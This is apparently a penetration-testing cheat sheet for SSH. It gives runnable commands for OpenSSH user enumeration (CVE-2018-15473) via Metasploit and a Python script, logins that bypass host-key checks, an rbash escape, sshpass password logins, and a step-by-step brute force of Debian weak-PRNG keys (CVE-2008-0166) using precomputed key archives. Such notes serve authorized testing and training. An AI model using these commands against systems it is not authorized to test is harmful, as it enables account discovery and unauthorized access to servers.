22 ) SSH
User Enumeration (OpenSSH 7.7 | CVE-2018-15473)
## ------------------| Using MSF
use auxiliary/scanner/ssh/ssh_enumusers
set RHOSTS <IP>
set USER_FILE userlist.txt
run
## ------------------| Using Python
git clone https://gitlab.com/epi052/cve-2018-15473.git && cd cve-2018-15473
pip install -r requirements.txt
python3 ssh-username-enum.py -w userlist.txt <IP>
SSH login with options
## ------------------| Disable SSH PubKeys [Used for windows with ssh]
ssh -o PubkeyAuthentication=no user@host
ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no user@host
ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss user@host
## ------------------| Prevents ssh from attempting to save the host key
ssh -o UserKnownHostsFile=/dev/null user@host
## ------------------| Instruct ssh to not prompt us to accept the host key
ssh -o StrictHostKeyChecking=no user@host
## ------------------| Escape rbash
ssh -t bash user@host
## ------------------| Using sshpass
sshpass -f<key> ssh <user>@<IP>
sshpass -p<password> ssh <user>@<ip>
CVE-2008-0166 (
Debian-based systems | September 2006 <--> 2008 May 13th
)
https://www.exploit-db.com/exploits/5720
Predictable PRNG Brute Force SSH
## ------------------| Info
## OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives)
## you need authorized_keys file on your machine.
## ------------------| Setup
## Add "PubkeyAcceptedKeyTypes +ssh-dss" to /etc/ssh/ssh_config file
git clone https://github.com/g0tmi1k/debian-ssh
wget https://github.com/g0tmi1k/debian-ssh/raw/master/common_keys/debian_ssh_dsa_1024_x86.tar.bz2
wget https://github.com/g0tmi1k/debian-ssh/raw/master/common_keys/debian_ssh_rsa_2048_x86.tar.bz2
tar -xf *.bz2
## check anything match with authorized_keys file.
## Copy the first 40 chars in the authorized_keys, then search it in the repo
grep -lr 'AAAAB3NzaC1kc3MAAACBAOgzzMCD3Im5bRnAVdV3yLwTsyNA'
## After finding the pub key, The corresponding Private key which is also in the same directory (without pub).
ssh -i key -oKexAlgorithms=+diffie-hellman-group1-sha1 <USER>@$IP
Last updated